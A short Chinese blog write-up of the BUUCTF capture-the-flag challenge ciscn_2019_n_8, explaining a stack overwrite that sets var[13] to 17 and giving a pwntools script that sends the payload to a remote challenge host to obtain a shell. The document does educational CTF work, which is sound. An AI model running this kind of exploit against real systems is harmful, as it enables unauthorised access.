BUUCTF—ciscn_2019_n_8

先看看保护机制

然后打开32位ida看看

发现它就是要读入一个字符串到var这个局部数组里面,然后如果var[13]是17的话就给shell,那么这个不是随便改吗,都在栈上了,如果不想算偏移就直接一片17覆盖过去,想算的话算一下就是0xe

from pwn import*
p=remote('node4.buuoj.cn',25887)
payload=p32(17)*14
p.recvuntil('name?\n')
p.sendline(payload)
p.interactive()
posted @ 2022-10-07 15:18  予柒  阅读(497)  评论(0)    收藏  举报
返回顶端
Live2D /*修改地一:waifu.css*/
/*修改地二:waifu.css*/
/*修改地三:live2d.js*/ /*修改地四:waifu-tips.js*/